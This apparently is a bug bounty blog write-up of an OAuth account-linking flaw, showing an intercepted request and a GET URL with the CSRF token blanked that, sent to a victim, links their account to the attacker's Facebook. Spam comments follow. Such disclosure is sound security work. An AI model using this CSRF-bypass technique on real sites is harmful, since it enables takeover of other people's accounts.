Categories
Uncategorized

Vulnerability – Account takeover using OAuth Misconfiguration

About Oauth

OAuth is an open standard for access delegation, commonly used as a way for Internet users to grant websites or applications access to their information on other websites but without giving them the passwords. This mechanism is used by companies such as Google, Facebook, Microsoft and Twitter to permit the users to share information about their accounts with third party applications or websites.

Generally, OAuth provides to clients a “secure delegated access” to server resources on behalf of a resource owner. It specifies a process for resource owners to authorize third-party access to their server resources without sharing their credentials. Designed specifically to work with Hypertext Transfer Protocol (HTTP), OAuth essentially allows access tokens to be issued to third-party clients by an authorization server, with the approval of the resource owner. The third party then uses the access token to access the protected resources hosted by the resource server.

Case Study

As this was a private program all illustrations of vulnerabilities will be represented with the host as example.com

The application had a Registration page where a user could register a new username and password which allowed him to log in to the application via the login page.

After successful registration you will be redirected to profile page where you need to fill some more details related to your self and you are good to go.

In the account section you have option to link your Facebook, LinkedIn account.

When you click on link Facebook you will be redirected to Facebook.com and you need to click on authorize this app.

Click on authorize and intercept the request the request, looks something like.

POST /faceboook/couple HTTP/1.1
Host: example.com
user-Agent: Mozilla/5.0
Accept: application/json, text/javascript, /; q=0.0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, default
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 293
COnnection: close
cookie:

action=couple&access_token=EAAcfyakm,smvnoqgrfuabvkscbvkjwer97823lasnvc9274qyrfhslnc9284fghlcv2bksacvbkisdasbksdbvkbsdkf78asdfbvsda87fsaddbv978sdfbd98sabv98sdvb4hfnsc932fofn4209qytf03fhnbc92y0fhgbce972y308hc92qyf&csrf=98798asfdcasf7d98s7adf98s7df98a7sdf9

As you can see the POST request has a CSRF token this can be omitted by changing this POST request to GET request something like.

https://www.example.com/facebook/couple?action=couple&access_token=EAAcfyakm,smvnoqgrfuabvkscbvkjwer97823lasnvc9274qyrfhslnc9284fghlcv2bksacvbkisdasbksdbvkbsdkf78asdfbvsda87fsaddbv978sdfbd98sabv98sdvb4hfnsc932fofn4209qytf03fhnbc92y0fhgbce972y308hc92qy&csrf=

And send this to victim as soon as the victim visits the link his/her account will be linked to your Facebook account and you can access that with login with Facebook option.

Reported: 3 march 2020
Responded: 4 march 2020
Rewarded: $300 6 march 2020

7 replies on “Vulnerability – Account takeover using OAuth Misconfiguration”

I have learn a few excellent stuff here. Certainly price bookmarking for revisiting.
I surprise how much effort you set to create one of these excellent informative site.

If some one wishes expert view on the topic of blogging and site-building afterward i propose him/her to go to see this web site,
Keep up the nice work.

I’m not certain where you are getting your information, however good topic.
I must spend a while finding out much more or understanding
more. Thanks for wonderful information I was in search of this information for my mission.

I like the helpful information you provide in your articles.
I will bookmark your weblog and check again here frequently.
I am quite sure I will learn plenty of new stuff right here!
Good luck for the next!

Like!! I blog quite often and I genuinely thank you for your information. The article has truly peaked my interest.

Leave a Reply

Your email address will not be published. Required fields are marked *